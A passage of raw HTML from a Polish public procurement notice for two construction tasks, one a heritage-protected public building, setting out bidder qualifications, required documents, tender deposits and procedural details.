collapse;'>45410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421131-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45430000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45453000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-11-15</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku udziału w postępowaniu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">W zakresie zadania nr 1:- posiada środki finansowe lub zdolność kredytową w wysokości 1 000 000,00 zł,W zakresie zadania nr 2:Wykonawca posiada potencjał ekonomiczny i finansowy, tj.: posiada środki finansowe lub zdolność kredytową w wysokości 200 000,00 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">W zakresie zadania nr 1:Wykonawca posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania polegające na budowie odbudowie, rozbudowie, nadbudowie obiektu użyteczności publicznej o kubaturze min. 7000 m3. Przy czym w ramach jedno z tych winna być zamontowana fasada szklana o powierzchni min. 150 m2.W zakresie zadania nr 2:Wykonawca posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania polegające na remoncie lub przebudowie obiektu użyteczności publicznej będącego pod ochroną konserwatorską o wartości min. 700 000 zł brutto każde.W zakresie zadania nr 1:Wykonawca dysponuje co najmniej: - jedną osobą (pełniącą funkcję kierownika budowy):o	posiadającą uprawnienia do prowadzenia prac ogólnobudowlanych bez ograniczeń;o	która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury (zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U.2017.2187 t.j.));o	posiadającą min. 5 letnim doświadczeniem (60 miesięcy) w zakresie kierowania robotami budowlanymi (przez miesiąc Zamawiający rozumie okres 30 dni);o	posiadającą doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na budowie, odbudowie, rozbudowie lub nadbudowie przebudowie przynajmniej jednego obiektu użyteczności publicznej;- jedną osobą posiadającą:o	uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych (zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub posiadająca odpowiednie kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65); o	doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na budowie, odbudowie, rozbudowie lub nadbudowie przebudowie przynajmniej jednego obiektu użyteczności publicznej;- jedną osobą posiadającą:o	uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub posiadająca odpowiednie kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65);o	doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na budowie, odbudowie, rozbudowie lub nadbudowie przebudowie przynajmniej jednego obiektu użyteczności publicznej;W zakresie zadania nr 2:Wykonawca dysponuje co najmniej: - jedną osobą (pełniącą funkcję kierownika budowy):o	posiadającą uprawnienia do prowadzenia prac ogólnobudowlanych bez ograniczeń;o	posiadającą min. 5 letnim doświadczeniem (60 miesięcy) w zakresie kierowania robotami budowlanymi (przez miesiąc Zamawiający rozumie okres 30 dni);o	która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury (zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U.2017.2187 t.j.));o	posiadającą doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na remoncie przynajmniej jednego obiektu budowlanego znajdującym pod ochroną konserwatorską;- jedną osobą posiadającą:o	uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych (zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub posiadająca odpowiednie kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65);o	doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na remoncie przynajmniej jednego obiektu budowlanego znajdującym pod ochroną konserwatorską;- jedną osobą posiadającą: o	uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub posiadająca odpowiednie kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65);o	doświadczenie w okresie ostatnich 5 lat przed upływem terminu składania ofert w robotach budowlanych polegających na remoncie przynajmniej jednego obiektu budowlanego znajdującym pod ochroną konserwatorską;</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (dokument składany na wezwanie Zamawiającego),Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (dokument składany na wezwanie Zamawiającego),Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert (dokument składany na wezwanie Zamawiającego),</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Ustawy,b)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument składany na wezwanie Zamawiającego),c)	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument składany na wezwanie Zamawiającego),d)	Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wykonawca zobowiązany jest wnieść wadium w wysokości:- 270.000,00 zł w zakresie zadania nr 1- 32.000,00 zł w zakresie zadania nr 22. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas gdy przed upływem terminu składania ofert kwota wniesionego wadium będzie uznana na rachunku bankowym Zamawiającego. Zaleca się, aby kopię dowodu wniesienia wadium załączyć do oferty.3. Wadium może być wnoszone w jednej lub kilku następujących formach:a)	pieniądzu:przelewem na rachunek bankowy Zamawiającego: 29 1090 1535 0000 0001 0575 6861b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;c)	gwarancjach bankowych;d)	gwarancjach ubezpieczeniowych;e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.4. Zwrot lub zatrzymanie wadium następuje na zasadach określonych w art. 46 Ustawy.5. Wadium wnoszone w innej niż pieniądz formie musi posiadać ważność co najmniej do końca terminu związania wykonawcy złożoną przez niego ofertą.6. W przypadku wniesienia wadium w innej formie niż pieniądz należy załączyć do oferty odpowiedni dokument, nie spięty w całość z ofertą.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span 